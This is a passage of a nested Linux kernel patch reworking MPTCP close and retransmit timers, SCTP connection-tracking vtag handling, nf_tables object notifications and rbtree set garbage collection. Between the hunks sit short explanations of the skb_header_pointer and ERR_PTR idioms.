+ 	return timer_pending(&inet_csk(sk)->icsk_retransmit_timer);
+ }
+ 
+-static void mptcp_reset_timer(struct sock *sk)
++static void mptcp_reset_rtx_timer(struct sock *sk)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 	unsigned long tout;
+@@ -1054,10 +1095,10 @@ static void __mptcp_clean_una(struct sock *sk)
+ out:
+ 	if (snd_una == READ_ONCE(msk->snd_nxt) &&
+ 	    snd_una == READ_ONCE(msk->write_seq)) {
+-		if (mptcp_timer_pending(sk) && !mptcp_data_fin_enabled(msk))
+-			mptcp_stop_timer(sk);
++		if (mptcp_rtx_timer_pending(sk) && !mptcp_data_fin_enabled(msk))
++			mptcp_stop_rtx_timer(sk);
+ 	} else {
+-		mptcp_reset_timer(sk);
++		mptcp_reset_rtx_timer(sk);
+ 	}
+ }
+ 
+@@ -1606,8 +1647,8 @@ void __mptcp_push_pending(struct sock *sk, unsigned int flags)
+ 
+ out:
+ 	/* ensure the rtx timer is running */
+-	if (!mptcp_timer_pending(sk))
+-		mptcp_reset_timer(sk);
++	if (!mptcp_rtx_timer_pending(sk))
++		mptcp_reset_rtx_timer(sk);
+ 	if (do_check_data_fin)
+ 		mptcp_check_send_data_fin(sk);
+ }
+@@ -1665,8 +1706,8 @@ out:
+ 	if (copied) {
+ 		tcp_push(ssk, 0, info.mss_now, tcp_sk(ssk)->nonagle,
+ 			 info.size_goal);
+-		if (!mptcp_timer_pending(sk))
+-			mptcp_reset_timer(sk);
++		if (!mptcp_rtx_timer_pending(sk))
++			mptcp_reset_rtx_timer(sk);
+ 
+ 		if (msk->snd_data_fin_enable &&
+ 		    msk->snd_nxt + 1 == msk->write_seq)
+@@ -2227,7 +2268,7 @@ static void mptcp_retransmit_timer(struct timer_list *t)
+ 	sock_put(sk);
+ }
+ 
+-static void mptcp_timeout_timer(struct timer_list *t)
++static void mptcp_tout_timer(struct timer_list *t)
+ {
+ 	struct sock *sk = from_timer(sk, t, sk_timer);
+ 
+@@ -2349,18 +2390,14 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	bool dispose_it, need_push = false;
+ 
+ 	/* If the first subflow moved to a close state before accept, e.g. due
+-	 * to an incoming reset, mptcp either:
+-	 * - if either the subflow or the msk are dead, destroy the context
+-	 *   (the subflow socket is deleted by inet_child_forget) and the msk
+-	 * - otherwise do nothing at the moment and take action at accept and/or
+-	 *   listener shutdown - user-space must be able to accept() the closed
+-	 *   socket.
++	 * to an incoming reset or listener shutdown, the subflow socket is
++	 * already deleted by inet_child_forget() and the mptcp socket can't
++	 * survive either.
+ 	 */
+-	if (msk->in_accept_queue && msk->first == ssk) {
+-		if (!sock_flag(sk, SOCK_DEAD) && !sock_flag(ssk, SOCK_DEAD))
+-			return;
+-
++	if (msk->in_accept_queue && msk->first == ssk &&
++	    (sock_flag(sk, SOCK_DEAD) || sock_flag(ssk, SOCK_DEAD))) {
+ 		/* ensure later check in mptcp_worker() will dispose the msk */
++		mptcp_set_close_tout(sk, tcp_jiffies32 - (TCP_TIMEWAIT_LEN + 1));
+ 		sock_set_flag(sk, SOCK_DEAD);
+ 		lock_sock_nested(ssk, SINGLE_DEPTH_NESTING);
+ 		mptcp_subflow_drop_ctx(ssk);
+@@ -2413,6 +2450,7 @@ static void __mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+ 	}
+ 
+ out_release:
++	__mptcp_subflow_error_report(sk, ssk);
+ 	release_sock(ssk);
+ 
+ 	sock_put(ssk);
+@@ -2426,6 +2464,22 @@ out:
+ 
+ 	if (need_push)
+ 		__mptcp_push_pending(sk, 0);
++
++	/* Catch every 'all subflows closed' scenario, including peers silently
++	 * closing them, e.g. due to timeout.
++	 * For established sockets, allow an additional timeout before closing,
++	 * as the protocol can still create more subflows.
++	 */
++	if (list_is_singular(&msk->conn_list) && msk->first &&
++	    inet_sk_state_load(msk->first) == TCP_CLOSE) {
++		if (sk->sk_state != TCP_ESTABLISHED ||
++		    msk->in_accept_queue || sock_flag(sk, SOCK_DEAD)) {
++			inet_sk_state_store(sk, TCP_CLOSE);
++			mptcp_close_wake_up(sk);
++		} else {
++			mptcp_start_tout_timer(sk);
++		}
++	}
+ }
+ 
+ void mptcp_close_ssk(struct sock *sk, struct sock *ssk,
+@@ -2469,23 +2523,14 @@ static void __mptcp_close_subflow(struct sock *sk)
+ 
+ }
+ 
+-static bool mptcp_should_close(const struct sock *sk)
++static bool mptcp_close_tout_expired(const struct sock *sk)
+ {
+-	s32 delta = tcp_jiffies32 - inet_csk(sk)->icsk_mtup.probe_timestamp;
+-	struct mptcp_subflow_context *subflow;
+-
+-	if (delta >= TCP_TIMEWAIT_LEN || mptcp_sk(sk)->in_accept_queue)
+-		return true;
++	if (!inet_csk(sk)->icsk_mtup.probe_timestamp ||
++	    sk->sk_state == TCP_CLOSE)
++		return false;
+ 
+-	/* if all subflows are in closed status don't bother with additional
+-	 * timeout
+-	 */
+-	mptcp_for_each_subflow(mptcp_sk(sk), subflow) {
+-		if (inet_sk_state_load(mptcp_subflow_tcp_sock(subflow)) !=
+-		    TCP_CLOSE)
+-			return false;
+-	}
+-	return true;
++	return time_after32(tcp_jiffies32,
++		  inet_csk(sk)->icsk_mtup.probe_timestamp + TCP_TIMEWAIT_LEN);
+ }
+ 
+ static void mptcp_check_fastclose(struct mptcp_sock *msk)
+@@ -2513,15 +2558,15 @@ static void mptcp_check_fastclose(struct mptcp_sock *msk)
+ 	/* Mirror the tcp_reset() error propagation */
+ 	switch (sk->sk_state) {
+ 	case TCP_SYN_SENT:
+-		sk->sk_err = ECONNREFUSED;
++		WRITE_ONCE(sk->sk_err, ECONNREFUSED);
+ 		break;
+ 	case TCP_CLOSE_WAIT:
+-		sk->sk_err = EPIPE;
++		WRITE_ONCE(sk->sk_err, EPIPE);
+ 		break;
+ 	case TCP_CLOSE:
+ 		return;
+ 	default:
+-		sk->sk_err = ECONNRESET;
++		WRITE_ONCE(sk->sk_err, ECONNRESET);
+ 	}
+ 
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+@@ -2597,27 +2642,28 @@ static void __mptcp_retrans(struct sock *sk)
+ reset_timer:
+ 	mptcp_check_and_set_pending(sk);
+ 
+-	if (!mptcp_timer_pending(sk))
+-		mptcp_reset_timer(sk);
++	if (!mptcp_rtx_timer_pending(sk))
++		mptcp_reset_rtx_timer(sk);
+ }
+ 
+ /* schedule the timeout timer for the relevant event: either close timeout
+  * or mp_fail timeout. The close timeout takes precedence over the mp_fail one
+  */
+-void mptcp_reset_timeout(struct mptcp_sock *msk, unsigned long fail_tout)
++void mptcp_reset_tout_timer(struct mptcp_sock *msk, unsigned long fail_tout)
+ {
+ 	struct sock *sk = (struct sock *)msk;
+ 	unsigned long timeout, close_timeout;
+ 
+-	if (!fail_tout && !sock_flag(sk, SOCK_DEAD))
++	if (!fail_tout && !inet_csk(sk)->icsk_mtup.probe_timestamp)
+ 		return;
+ 
+-	close_timeout = inet_csk(sk)->icsk_mtup.probe_timestamp - tcp_jiffies32 + jiffies + TCP_TIMEWAIT_LEN;
++	close_timeout = inet_csk(sk)->icsk_mtup.probe_timestamp - tcp_jiffies32 + jiffies +
++			TCP_TIMEWAIT_LEN;
+ 
+ 	/* the close timeout takes precedence over the fail one, and here at least one of
+ 	 * them is active
+ 	 */
+-	timeout = sock_flag(sk, SOCK_DEAD) ? close_timeout : fail_tout;
++	timeout = inet_csk(sk)->icsk_mtup.probe_timestamp ? close_timeout : fail_tout;
+ 
+ 	sk_reset_timer(sk, &sk->sk_timer, timeout);
+ }
+@@ -2636,8 +2682,6 @@ static void mptcp_mp_fail_no_response(struct mptcp_sock *msk)
+ 	mptcp_subflow_reset(ssk);
+ 	WRITE_ONCE(mptcp_subflow_ctx(ssk)->fail_tout, 0);
+ 	unlock_sock_fast(ssk, slow);
+-
+-	mptcp_reset_timeout(msk, 0);
+ }
+ 
+ static void mptcp_do_fastclose(struct sock *sk)
+@@ -2676,19 +2720,15 @@ static void mptcp_worker(struct work_struct *work)
+ 	if (test_and_clear_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
+ 		__mptcp_close_subflow(sk);
+ 
+-	/* There is no point in keeping around an orphaned sk timedout or
+-	 * closed, but we need the msk around to reply to incoming DATA_FIN,
+-	 * even if it is orphaned and in FIN_WAIT2 state
+-	 */
+-	if (sock_flag(sk, SOCK_DEAD)) {
+-		if (mptcp_should_close(sk)) {
+-			inet_sk_state_store(sk, TCP_CLOSE);
+-			mptcp_do_fastclose(sk);
+-		}
+-		if (sk->sk_state == TCP_CLOSE) {
+-			__mptcp_destroy_sock(sk);
+-			goto unlock;
+-		}
++	if (mptcp_close_tout_expired(sk)) {
++		inet_sk_state_store(sk, TCP_CLOSE);
++		mptcp_do_fastclose(sk);
++		mptcp_close_wake_up(sk);
++	}
++
++	if (sock_flag(sk, SOCK_DEAD) && sk->sk_state == TCP_CLOSE) {
++		__mptcp_destroy_sock(sk);
++		goto unlock;
+ 	}
+ 
+ 	if (test_and_clear_bit(MPTCP_WORK_RTX, &msk->flags))
+@@ -2728,7 +2768,7 @@ static int __mptcp_init_sock(struct sock *sk)
+ 
+ 	/* re-use the csk retrans timer for MPTCP-level retrans */
+ 	timer_setup(&msk->sk.icsk_retransmit_timer, mptcp_retransmit_timer, 0);
+-	timer_setup(&sk->sk_timer, mptcp_timeout_timer, 0);
++	timer_setup(&sk->sk_timer, mptcp_tout_timer, 0);
+ 
+ 	return 0;
+ }
+@@ -2820,8 +2860,8 @@ void mptcp_subflow_shutdown(struct sock *sk, struct sock *ssk, int how)
+ 		} else {
+ 			pr_debug("Sending DATA_FIN on subflow %p", ssk);
+ 			tcp_send_ack(ssk);
+-			if (!mptcp_timer_pending(sk))
+-				mptcp_reset_timer(sk);
++			if (!mptcp_rtx_timer_pending(sk))
++				mptcp_reset_rtx_timer(sk);
+ 		}
+ 		break;
+ 	}
+@@ -2904,7 +2944,7 @@ static void __mptcp_destroy_sock(struct sock *sk)
+ 
+ 	might_sleep();
+ 
+-	mptcp_stop_timer(sk);
++	mptcp_stop_rtx_timer(sk);
+ 	sk_stop_timer(sk, &sk->sk_timer);
+ 	msk->pm.status = 0;
+ 
+@@ -2984,7 +3024,6 @@ bool __mptcp_close(struct sock *sk, long timeout)
+ 
+ cleanup:
+ 	/* orphan all the subflows */
+-	inet_csk(sk)->icsk_mtup.probe_timestamp = tcp_jiffies32;
+ 	mptcp_for_each_subflow(msk, subflow) {
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 		bool slow = lock_sock_fast_nested(ssk);
+@@ -3021,7 +3060,7 @@ cleanup:
+ 		__mptcp_destroy_sock(sk);
+ 		do_cancel_work = true;
+ 	} else {
+-		mptcp_reset_timeout(msk, 0);
++		mptcp_start_tout_timer(sk);
+ 	}
+ 
+ 	return do_cancel_work;
+@@ -3084,8 +3123,8 @@ static int mptcp_disconnect(struct sock *sk, int flags)
+ 	mptcp_check_listen_stop(sk);
+ 	inet_sk_state_store(sk, TCP_CLOSE);
+ 
+-	mptcp_stop_timer(sk);
+-	sk_stop_timer(sk, &sk->sk_timer);
++	mptcp_stop_rtx_timer(sk);
++	mptcp_stop_tout_timer(sk);
+ 
+ 	if (mptcp_sk(sk)->token)
+ 		mptcp_event(MPTCP_EVENT_CLOSED, mptcp_sk(sk), NULL, GFP_KERNEL);
+@@ -3895,7 +3934,7 @@ static __poll_t mptcp_poll(struct file *file, struct socket *sock,
+ 
+ 	/* This barrier is coupled with smp_wmb() in __mptcp_error_report() */
+ 	smp_rmb();
+-	if (sk->sk_err)
++	if (READ_ONCE(sk->sk_err))
+ 		mask |= EPOLLERR;
+ 
+ 	return mask;
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index d77b25636125b..91d89a0aeb586 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -681,7 +681,29 @@ void mptcp_get_options(const struct sk_buff *skb,
+ 
+ void mptcp_finish_connect(struct sock *sk);
+ void __mptcp_set_connected(struct sock *sk);
+-void mptcp_reset_timeout(struct mptcp_sock *msk, unsigned long fail_tout);
++void mptcp_reset_tout_timer(struct mptcp_sock *msk, unsigned long fail_tout);
++
++static inline void mptcp_stop_tout_timer(struct sock *sk)
++{
++	if (!inet_csk(sk)->icsk_mtup.probe_timestamp)
++		return;
++
++	sk_stop_timer(sk, &sk->sk_timer);
++	inet_csk(sk)->icsk_mtup.probe_timestamp = 0;
++}
++
++static inline void mptcp_set_close_tout(struct sock *sk, unsigned long tout)
++{
++	/* avoid 0 timestamp, as that means no close timeout */
++	inet_csk(sk)->icsk_mtup.probe_timestamp = tout ? : 1;
++}
++
++static inline void mptcp_start_tout_timer(struct sock *sk)
++{
++	mptcp_set_close_tout(sk, tcp_jiffies32);
++	mptcp_reset_tout_timer(mptcp_sk(sk), 0);
++}
++
+ static inline bool mptcp_is_fully_established(struct sock *sk)
+ {
+ 	return inet_sk_state_load(sk) == TCP_ESTABLISHED &&
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 52a747a80e88e..b93b08a75017b 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1161,7 +1161,7 @@ static void mptcp_subflow_fail(struct mptcp_sock *msk, struct sock *ssk)
+ 	WRITE_ONCE(subflow->fail_tout, fail_tout);
+ 	tcp_send_ack(ssk);
+ 
+-	mptcp_reset_timeout(msk, subflow->fail_tout);
++	mptcp_reset_tout_timer(msk, subflow->fail_tout);
+ }
+ 
+ static bool subflow_check_data_avail(struct sock *ssk)
+@@ -1248,7 +1248,7 @@ fallback:
+ 			subflow->reset_reason = MPTCP_RST_EMPTCP;
+ 
+ reset:
+-			ssk->sk_err = EBADMSG;
++			WRITE_ONCE(ssk->sk_err, EBADMSG);
+ 			tcp_set_state(ssk, TCP_CLOSE);
+ 			while ((skb = skb_peek(&ssk->sk_receive_queue)))
+ 				sk_eat_skb(ssk, skb);
+@@ -1305,42 +1305,6 @@ void mptcp_space(const struct sock *ssk, int *space, int *full_space)
+ 	*full_space = tcp_full_space(sk);
+ }
+ 
+-void __mptcp_error_report(struct sock *sk)
+-{
+-	struct mptcp_subflow_context *subflow;
+-	struct mptcp_sock *msk = mptcp_sk(sk);
+-
+-	mptcp_for_each_subflow(msk, subflow) {
+-		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+-		int err = sock_error(ssk);
+-		int ssk_state;
+-
+-		if (!err)
+-			continue;
+-
+-		/* only propagate errors on fallen-back sockets or
+-		 * on MPC connect
+-		 */
+-		if (sk->sk_state != TCP_SYN_SENT && !__mptcp_check_fallback(msk))
+-			continue;
+-
+-		/* We need to propagate only transition to CLOSE state.
+-		 * Orphaned socket will see such state change via
+-		 * subflow_sched_work_if_closed() and that path will properly
+-		 * destroy the msk as needed.
+-		 */
+-		ssk_state = inet_sk_state_load(ssk);
+-		if (ssk_state == TCP_CLOSE && !sock_flag(sk, SOCK_DEAD))
+-			inet_sk_state_store(sk, ssk_state);
+-		sk->sk_err = -err;
+-
+-		/* This barrier is coupled with smp_rmb() in mptcp_poll() */
+-		smp_wmb();
+-		sk_error_report(sk);
+-		break;
+-	}
+-}
+-
+ static void subflow_error_report(struct sock *ssk)
+ {
+ 	struct sock *sk = mptcp_subflow_ctx(ssk)->conn;
+@@ -1527,6 +1491,7 @@ int __mptcp_subflow_connect(struct sock *sk, const struct mptcp_addr_info *loc,
+ 	mptcp_sock_graft(ssk, sk->sk_socket);
+ 	iput(SOCK_INODE(sf));
+ 	WRITE_ONCE(msk->allow_infinite_fallback, false);
++	mptcp_stop_tout_timer(sk);
+ 	return 0;
+ 
+ failed_unlink:
+diff --git a/net/netfilter/ipvs/ip_vs_sync.c b/net/netfilter/ipvs/ip_vs_sync.c
+index d4fe7bb4f853a..6574f4e651b1a 100644
+--- a/net/netfilter/ipvs/ip_vs_sync.c
++++ b/net/netfilter/ipvs/ip_vs_sync.c
+@@ -1507,8 +1507,8 @@ static int make_send_sock(struct netns_ipvs *ipvs, int id,
+ 	}
+ 
+ 	get_mcast_sockaddr(&mcast_addr, &salen, &ipvs->mcfg, id);
+-	result = sock->ops->connect(sock, (struct sockaddr *) &mcast_addr,
+-				    salen, 0);
++	result = kernel_connect(sock, (struct sockaddr *)&mcast_addr,
++				salen, 0);
+ 	if (result < 0) {
+ 		pr_err("Error connecting to the multicast addr\n");
+ 		goto error;
+diff --git a/net/netfilter/nf_conntrack_proto_sctp.c b/net/netfilter/nf_conntrack_proto_sctp.c
+index 7247af51bdfc4..c94a9971d790c 100644
+--- a/net/netfilter/nf_conntrack_proto_sctp.c
++++ b/net/netfilter/nf_conntrack_proto_sctp.c
+@@ -112,7 +112,7 @@ static const u8 sctp_conntracks[2][11][SCTP_CONNTRACK_MAX] = {
+ /* shutdown_ack */ {sSA, sCL, sCW, sCE, sES, sSA, sSA, sSA, sSA},
+ /* error        */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL},/* Can't have Stale cookie*/
+ /* cookie_echo  */ {sCL, sCL, sCE, sCE, sES, sSS, sSR, sSA, sCL},/* 5.2.4 - Big TODO */
+-/* cookie_ack   */ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sCL},/* Can't come in orig dir */
++/* cookie_ack   */ {sCL, sCL, sCW, sES, sES, sSS, sSR, sSA, sCL},/* Can't come in orig dir */
+ /* shutdown_comp*/ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sCL, sCL},
+ /* heartbeat    */ {sHS, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS},
+ /* heartbeat_ack*/ {sCL, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS},
+@@ -126,7 +126,7 @@ static const u8 sctp_conntracks[2][11][SCTP_CONNTRACK_MAX] = {
+ /* shutdown     */ {sIV, sCL, sCW, sCE, sSR, sSS, sSR, sSA, sIV},
+ /* shutdown_ack */ {sIV, sCL, sCW, sCE, sES, sSA, sSA, sSA, sIV},
+ /* error        */ {sIV, sCL, sCW, sCL, sES, sSS, sSR, sSA, sIV},
+-/* cookie_echo  */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sIV},/* Can't come in reply dir */
++/* cookie_echo  */ {sIV, sCL, sCE, sCE, sES, sSS, sSR, sSA, sIV},/* Can't come in reply dir */
+ /* cookie_ack   */ {sIV, sCL, sCW, sES, sES, sSS, sSR, sSA, sIV},
+ /* shutdown_comp*/ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sCL, sIV},
+ /* heartbeat    */ {sIV, sCL, sCW, sCE, sES, sSS, sSR, sSA, sHS},
+@@ -426,6 +426,9 @@ int nf_conntrack_sctp_packet(struct nf_conn *ct,
+ 			/* (D) vtag must be same as init_vtag as found in INIT_ACK */
+ 			if (sh->vtag != ct->proto.sctp.vtag[dir])
+ 				goto out_unlock;
++		} else if (sch->type == SCTP_CID_COOKIE_ACK) {
++			ct->proto.sctp.init[dir] = 0;
++			ct->proto.sctp.init[!dir] = 0;
+ 		} else if (sch->type == SCTP_CID_HEARTBEAT) {
+ 			if (ct->proto.sctp.vtag[dir] == 0) {
+ 				pr_debug("Setting %d vtag %x for dir %d\n", sch->type, sh->vtag, dir);
+@@ -474,16 +477,18 @@ int nf_conntrack_sctp_packet(struct nf_conn *ct,
+ 		}
+ 
+ 		/* If it is an INIT or an INIT ACK note down the vtag */
+-		if (sch->type == SCTP_CID_INIT ||
+-		    sch->type == SCTP_CID_INIT_ACK) {
+-			struct sctp_inithdr _inithdr, *ih;
++		if (sch->type == SCTP_CID_INIT) {
++			struct sctp_inithdr _ih, *ih;
+ 
+-			ih = skb_header_pointer(skb, offset + sizeof(_sch),
+-						sizeof(_inithdr), &_inithdr);
+-			if (ih == NULL)
++			ih = skb_header_pointer(skb, offset + sizeof(_sch), sizeof(*ih), &_ih);
++			if (!ih)
+ 				goto out_unlock;
+-			pr_debug("Setting vtag %x for dir %d\n",
+-				 ih->init_tag, !dir);
++
++			if (ct->proto.sctp.init[dir] && ct->proto.sctp.init[!dir])
++				ct->proto.sctp.init[!dir] = 0;
++			ct->proto.sctp.init[dir] = 1;
++
++			pr_debug("Setting vtag %x for dir %d\n", ih->init_tag, !dir);
+ 			ct->proto.sctp.vtag[!dir] = ih->init_tag;
+ 
+ 			/* don't renew timeout on init retransmit so
+@@ -494,6 +499,24 @@ int nf_conntrack_sctp_packet(struct nf_conn *ct,
+ 			    old_state == SCTP_CONNTRACK_CLOSED &&
+ 			    nf_ct_is_confirmed(ct))
+ 				ignore = true;
++		} else if (sch->type == SCTP_CID_INIT_ACK) {
++			struct sctp_inithdr _ih, *ih;
++			__be32 vtag;
++
++			ih = skb_header_pointer(skb, offset + sizeof(_sch), sizeof(*ih), &_ih);
++			if (!ih)
++				goto out_unlock;
++
++			vtag = ct->proto.sctp.vtag[!dir];
++			if (!ct->proto.sctp.init[!dir] && vtag && vtag != ih->init_tag)
++				goto out_unlock;
++			/* collision */
++			if (ct->proto.sctp.init[dir] && ct->proto.sctp.init[!dir] &&
++			    vtag != ih->init_tag)
++				goto out_unlock;
++
++			pr_debug("Setting vtag %x for dir %d\n", ih->init_tag, !dir);
++			ct->proto.sctp.vtag[!dir] = ih->init_tag;
+ 		}
+ 
+ 		ct->proto.sctp.state = new_state;
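
Both the INIT and INIT_ACK branches above rely on skb_header_pointer(), which returns a pointer into the skb's linear data when the requested range is already contiguous and otherwise copies the bytes into the caller's stack buffer, so the result must always be NULL-checked. The idiom in isolation (simplified; the real code also accounts for the chunk offset):

	struct sctp_inithdr _ih, *ih;

	/* Either points into skb->data or into _ih; NULL if the packet
	 * is too short to contain a complete init header.
	 */
	ih = skb_header_pointer(skb, offset + sizeof(_sch), sizeof(*ih), &_ih);
	if (!ih)
		goto out_unlock;	/* truncated packet, don't track it */
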
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 52b81dc1fcf5b..5e3dbe2652dbd 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -7576,24 +7576,14 @@ static int nf_tables_delobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 	return nft_delobj(&ctx, obj);
+ }
+ 
+-void nft_obj_notify(struct net *net, const struct nft_table *table,
+-		    struct nft_object *obj, u32 portid, u32 seq, int event,
+-		    u16 flags, int family, int report, gfp_t gfp)
++static void
++__nft_obj_notify(struct net *net, const struct nft_table *table,
++		 struct nft_object *obj, u32 portid, u32 seq, int event,
++		 u16 flags, int family, int report, gfp_t gfp)
+ {
+ 	struct nftables_pernet *nft_net = nft_pernet(net);
+ 	struct sk_buff *skb;
+ 	int err;
+-	char *buf = kasprintf(gfp, "%s:%u",
+-			      table->name, nft_net->base_seq);
+-
+-	audit_log_nfcfg(buf,
+-			family,
+-			obj->handle,
+-			event == NFT_MSG_NEWOBJ ?
+-				 AUDIT_NFT_OP_OBJ_REGISTER :
+-				 AUDIT_NFT_OP_OBJ_UNREGISTER,
+-			gfp);
+-	kfree(buf);
+ 
+ 	if (!report &&
+ 	    !nfnetlink_has_listeners(net, NFNLGRP_NFTABLES))
+@@ -7616,13 +7606,35 @@ void nft_obj_notify(struct net *net, const struct nft_table *table,
+ err:
+ 	nfnetlink_set_err(net, portid, NFNLGRP_NFTABLES, -ENOBUFS);
+ }
++
++void nft_obj_notify(struct net *net, const struct nft_table *table,
++		    struct nft_object *obj, u32 portid, u32 seq, int event,
++		    u16 flags, int family, int report, gfp_t gfp)
++{
++	struct nftables_pernet *nft_net = nft_pernet(net);
++	char *buf = kasprintf(gfp, "%s:%u",
++			      table->name, nft_net->base_seq);
++
++	audit_log_nfcfg(buf,
++			family,
++			obj->handle,
++			event == NFT_MSG_NEWOBJ ?
++				 AUDIT_NFT_OP_OBJ_REGISTER :
++				 AUDIT_NFT_OP_OBJ_UNREGISTER,
++			gfp);
++	kfree(buf);
++
++	__nft_obj_notify(net, table, obj, portid, seq, event,
++			 flags, family, report, gfp);
++}
+ EXPORT_SYMBOL_GPL(nft_obj_notify);
+ 
+ static void nf_tables_obj_notify(const struct nft_ctx *ctx,
+ 				 struct nft_object *obj, int event)
+ {
+-	nft_obj_notify(ctx->net, ctx->table, obj, ctx->portid, ctx->seq, event,
+-		       ctx->flags, ctx->family, ctx->report, GFP_KERNEL);
++	__nft_obj_notify(ctx->net, ctx->table, obj, ctx->portid,
++			 ctx->seq, event, ctx->flags, ctx->family,
++			 ctx->report, GFP_KERNEL);
+ }
+ 
+ /*
+diff --git a/net/netfilter/nft_set_rbtree.c b/net/netfilter/nft_set_rbtree.c
+index 487572dcd6144..2660ceab3759d 100644
+--- a/net/netfilter/nft_set_rbtree.c
++++ b/net/netfilter/nft_set_rbtree.c
+@@ -233,10 +233,9 @@ static void nft_rbtree_gc_remove(struct net *net, struct nft_set *set,
+ 	rb_erase(&rbe->node, &priv->root);
+ }
+ 
+-static int nft_rbtree_gc_elem(const struct nft_set *__set,
+-			      struct nft_rbtree *priv,
+-			      struct nft_rbtree_elem *rbe,
+-			      u8 genmask)
++static const struct nft_rbtree_elem *
++nft_rbtree_gc_elem(const struct nft_set *__set, struct nft_rbtree *priv,
++		   struct nft_rbtree_elem *rbe, u8 genmask)
+ {
+ 	struct nft_set *set = (struct nft_set *)__set;
+ 	struct rb_node *prev = rb_prev(&rbe->node);
+@@ -246,7 +245,7 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 
+ 	gc = nft_trans_gc_alloc(set, 0, GFP_ATOMIC);
+ 	if (!gc)
+-		return -ENOMEM;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	/* search for end interval coming before this element.
+ 	 * end intervals don't carry a timeout extension, they
+@@ -261,6 +260,7 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 		prev = rb_prev(prev);
+ 	}
+ 
++	rbe_prev = NULL;
+ 	if (prev) {
+ 		rbe_prev = rb_entry(prev, struct nft_rbtree_elem, node);
+ 		nft_rbtree_gc_remove(net, set, priv, rbe_prev);
+@@ -272,7 +272,7 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 		 */
+ 		gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
+ 		if (WARN_ON_ONCE(!gc))
+-			return -ENOMEM;
++			return ERR_PTR(-ENOMEM);
+ 
+ 		nft_trans_gc_elem_add(gc, rbe_prev);
+ 	}
+@@ -280,13 +280,13 @@ static int nft_rbtree_gc_elem(const struct nft_set *__set,
+ 	nft_rbtree_gc_remove(net, set, priv, rbe);
+ 	gc = nft_trans_gc_queue_sync(gc, GFP_ATOMIC);
+ 	if (WARN_ON_ONCE(!gc))
+-		return -ENOMEM;
++		return ERR_PTR(-ENOMEM);
+ 
+ 	nft_trans_gc_elem_add(gc, rbe);
+ 
+ 	nft_trans_gc_queue_sync_done(gc);
+ 
+-	return 0;
++	return rbe_prev;
+ }
+ 
+ static bool nft_rbtree_update_first(const struct nft_set *set,
+@@ -314,7 +314,7 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 	struct nft_rbtree *priv = nft_set_priv(set);
+ 	u8 cur_genmask = nft_genmask_cur(net);
+ 	u8 genmask = nft_genmask_next(net);
+-	int d, err;
++	int d;
+ 
+ 	/* Descend the tree to search for an existing element greater than the
+ 	 * key value to insert that is greater than the new element. This is the
+@@ -363,9 +363,14 @@ static int __nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 		 */
+ 		if (nft_set_elem_expired(&rbe->ext) &&
+ 		    nft_set_elem_active(&rbe->ext, cur_genmask)) {
+-			err = nft_rbtree_gc_elem(set, priv, rbe, genmask);
+-			if (err < 0)
+-				return err;
++			const struct nft_rbtree_elem *removed_end;
++
++			removed_end = nft_rbtree_gc_elem(set, priv, rbe, genmask);
++			if (IS_ERR(removed_end))
++				return PTR_ERR(removed_end);
++
++			if (removed_end == rbe_le || removed_end == rbe_ge)
++				return -EAGAIN;
+ 
+ 			continue;
+ 		}
+@@ -486,11 +491,18 @@ static int nft_rbtree_insert(const struct net *net, const struct nft_set *set,
+ 	struct nft_rbtree_elem *rbe = elem->priv;
+ 	int err;
+ 
+-	write_lock_bh(&priv->lock);
+-	write_seqcount_begin(&priv->count);
+-	err = __nft_rbtree_insert(net, set, rbe, ext);
+-	write_seqcount_end(&priv->count);
+-	write_unlock_bh(&priv->lock);
++	do {
++		if (fatal_signal_pending(current))
++			return -EINTR;
++
++		cond_resched();
++
++		write_lock_bh(&priv->lock);
++		write_seqcount_begin(&priv->count);
++		err = __nft_rbtree_insert(net, set, rbe, ext);
++		write_seqcount_end(&priv->count);
++		write_unlock_bh(&priv->lock);
++	} while (err == -EAGAIN);
+ 
+ 	return err;
+ }
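
The reworked garbage-collection helper reports the element it removed via the kernel's ERR_PTR convention, which encodes a negative errno in an otherwise invalid pointer value so a single return slot can carry either a result or an error. A self-contained userspace re-implementation of the idea (names are illustrative; the kernel's versions live in <linux/err.h>, and the casts assume a typical LP64 target):

	#include <stdio.h>
	#include <errno.h>
	#include <stdint.h>

	#define MAX_ERRNO	4095

	static inline void *err_ptr(long err)      { return (void *)err; }
	static inline long  ptr_err(const void *p) { return (long)p; }
	static inline int   is_err(const void *p)
	{
		/* errors occupy the top MAX_ERRNO addresses */
		return (uintptr_t)p >= (uintptr_t)-MAX_ERRNO;
	}

	static void *alloc_or_err(int fail)
	{
		static int slot;

		return fail ? err_ptr(-ENOMEM) : &slot;
	}

	int main(void)
	{
		void *p = alloc_or_err(1);

		if (is_err(p))
			printf("error: %ld\n", ptr_err(p));	/* error: -12 */
		return 0;
	}
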
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
